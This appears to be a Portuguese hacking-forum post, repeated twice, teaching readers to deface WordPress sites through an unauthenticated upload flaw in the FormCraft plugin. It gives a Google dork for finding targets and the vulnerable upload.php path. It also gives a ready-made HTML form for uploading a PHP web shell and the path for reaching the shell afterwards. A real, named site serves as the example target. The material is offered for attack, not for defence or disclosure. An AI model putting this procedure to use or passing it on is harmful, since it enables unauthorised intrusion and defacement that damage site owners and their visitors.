Boas pessoal,
Navegando ontem em busca de informações, vi uma forma de dar deface através da plataforma FormCraft, bom segue o tuto ai em baixo!
- Pesquise por essa dork no Google: "powered by Formcraft"
- Abra algum site resultado pela busca
- Para saber se o site está vulnerável a essa falha, vocês vão digitar esse endereço:
Após o endereço do site! Exemplo:
- Se o site escolhido por vocês retornar esse erro: {"failed":"No file found 2"}
Bingo! O site está vulnerável!
- Agora vocês abrem o bloco de notas e colem esse script lá:
- No script, em action="endereçosite" vocês vão subistuir pelo alvo de vocês, que no meu caso é o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., ficando então: action="http://lscegypt.net/wp-con.....
- Após acrescentado o endereço, salve o arquivo como HTML, pode colocar qualquer nome, tipo, upload.html, o importante é que esteja em HTML.
- Abram agora o arquivo que vocês salvaram, vai abrir uma pagina igual a essa:
- Vocês apertem em escolher arquivo, selecionem sua shell ou arquivo, e cliquem em upload.
- Eu upei um arquivo chamado: fh.php
- Na mesma pagina vai aparecer um script parecido com esse:
- Note que onde eu marquei, tem escrito: "154e5e5259b572---FH.php", que é o endereço que o arquivo está! Copiem esse endereço.
- Pronto, o vocês já enviaram a shell ou arquivo para o site, agora vamos acessá-los!
- Na mesma pagina, modifiquem o endereço la em cima "file-upload/server/php/upload.php", troquem esse, por esse: "file-upload/server/php/files/nomedoseuarquivo.php", que no meu caso, fica: "file-upload/server/php/files/154e5e5259b572---FH.php", meu endereço final ficou:
E ok, está pronto o sorvetinho . Usem por sua conta e risco!
Eu não desenvolvi este método, apenas traduzi e melhorei para o Português! qualquer duvida deixem no comentário, esse é meu primeiro post !
Tutorial Original: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Navegando ontem em busca de informações, vi uma forma de dar deface através da plataforma FormCraft, bom segue o tuto ai em baixo!
- Pesquise por essa dork no Google: "powered by Formcraft"
- Abra algum site resultado pela busca
- Para saber se o site está vulnerável a essa falha, vocês vão digitar esse endereço:
Código HTML:
wp-content/plugins/formcraft/file-upload/server/php/upload.php
Código HTML:
Edereço do site: http://lscegypt.net/wp-content/plugins/formcraft/file-upload/server/php/upload.php
Bingo! O site está vulnerável!
- Agora vocês abrem o bloco de notas e colem esse script lá:
Código HTML:
<form method="POST" action="endereçosite/wp-content/plugins/formcraft/file-upload/server/php/upload.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>
- Após acrescentado o endereço, salve o arquivo como HTML, pode colocar qualquer nome, tipo, upload.html, o importante é que esteja em HTML.
- Abram agora o arquivo que vocês salvaram, vai abrir uma pagina igual a essa:
- Vocês apertem em escolher arquivo, selecionem sua shell ou arquivo, e cliquem em upload.
- Eu upei um arquivo chamado: fh.php
- Na mesma pagina vai aparecer um script parecido com esse:
- Note que onde eu marquei, tem escrito: "154e5e5259b572---FH.php", que é o endereço que o arquivo está! Copiem esse endereço.
- Pronto, o vocês já enviaram a shell ou arquivo para o site, agora vamos acessá-los!
- Na mesma pagina, modifiquem o endereço la em cima "file-upload/server/php/upload.php", troquem esse, por esse: "file-upload/server/php/files/nomedoseuarquivo.php", que no meu caso, fica: "file-upload/server/php/files/154e5e5259b572---FH.php", meu endereço final ficou:
Código HTML:
http://lscegypt.net/wp-content/plugins/formcraft/file-upload/server/php/files/154e5e5259b572---FH.php
Eu não desenvolvi este método, apenas traduzi e melhorei para o Português! qualquer duvida deixem no comentário, esse é meu primeiro post !
Tutorial Original: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comment